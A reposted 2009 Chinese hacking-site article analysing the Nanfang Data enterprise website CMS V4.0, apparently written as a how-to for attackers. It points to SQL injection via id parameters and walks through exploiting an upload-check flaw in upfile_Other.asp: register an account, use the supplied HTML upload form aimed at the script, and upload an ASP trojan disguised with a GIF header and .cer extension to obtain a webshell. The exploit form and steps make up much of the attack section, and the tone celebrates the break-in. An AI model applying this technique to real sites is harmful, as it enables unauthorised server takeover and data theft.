为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

南方数据企业网站管理系统 V4.0漏洞分析

2009-2-4 07:43| 投稿: security

摘要: orgby:philoes -------------------------------------------------http://www.918x.com 在黑暗天堂上看到HAK_BaN...
orgby:philoes -------------------------------------------------http://www.918x.com 在黑暗天堂上看到HAK_BaN发现南方数据企业网站管理系统 V4.0有SQL注入(得到的是MD5加密以及后台可以利用数据库备份功 能得到webshell的漏洞,于是下载下来看了看,的确存在。不过我在分析它的漏洞的时候,发现了它的致命漏洞。今天就拿来和大 家一起分享!在此感谢rain以及HAK_BaN以及HAK_BaN群上的朋友。 先看看它的首页 首先说说它的注入漏洞,我随便点了几个有ID地址,妈的,手工试了一下,果然可以注如入 如:http://localhost/hacktest/nanfanggualiv40/shownews.asp?id=25 http://localhost/hacktest/nanfanggualiv40/ProductShow.asp?ArticleID=61 别的我就不找了。因为是ACCESS的数据库,我就不详细说注入过程了,不明白的可以参考我的另一篇文章---SQL injection with ACCESS(手动篇),强烈建议对手工注入还不是很熟悉的朋友结合SQL injection with ACCESS(手动篇)这篇文章,对该系统进行手 工注入。拿到加密了的密码后,当然是破解了啊,如果成功的话到后台利用数据库备份功能就可以得到webshell。当然有这个漏洞, 这个系统在很大程度来说就已经可以搞定了,我想HAK_BIN可能就是因为这点就没有去看别的漏洞。 现在我们来重点的,也就是我所说的致命漏洞,哈哈,还是上传漏洞。系统文件中有三个上传文件,文件的大致代码和动力文章的上传 文件代码相似,但我看第一个Upfile.asp上传文件时,里面加了一句 if session("AdminName")="" then response.Write("请登录后再使用本功能!") 也就是说,只有管理员才能用该功能,当时我在想有没有方法突破它,不过至少我没有方法,如果你有的,别忘了告诉我。 于是看看上传图片的文件Upfile_Photo.asp,和上面一样没发利用。抱着一线希望看了一下最后一个上传文件upfile_Other.asp 真走运,看到了 if session("AdminName")="" and session("UserName")="" then response.Write("请登录后再使用本功能!") 哈哈,漏洞存在,马上试试。 1:首先先注册一个用户:philoes 2:用注册的用户登陆,到处找上传的地方,但没找到,但我清楚不会影响我们利用该上传漏洞,哈哈。。。。。。(但后来想想 ,这里可能是作者的一点粗心,它只要吧and session("UserName")="" then去掉,我是没法利用的)。 3:打开利用代码加上提交地址。 利用代码如下: <HTML><HEAD> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <STYLE type=text/css>BODY { FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee } .tx1 { BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px } </STYLE> <META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD> <BODY leftMargin=0 topMargin=0> <FORM name=form1 action="http://localhost/hacktest/nanfanggualiv40/upfile_Other.asp"; method=post encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT style="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit> <INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML> [NextPage]   前面用一个gif文件,后面加以cer为后缀的asp木马,点提交,就可以看到木马的地址了哦,哈哈 ,是不是很兴奋啊! 4:当然是看看木马了,后面的事我就不说了,你想干吗,自己搞,不过我提醒你不要搞破坏. rain:动画里牵涉一个session的问题,我没有试.大家如果本地提交不成功的话,可以把上传的htm保存为gif,再在远程调用这个gif来上传.如果本地可以成功的话,就当我说了废话!!动画下载为:http://www.918x.com/showsoft.asp?soft_id=115

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部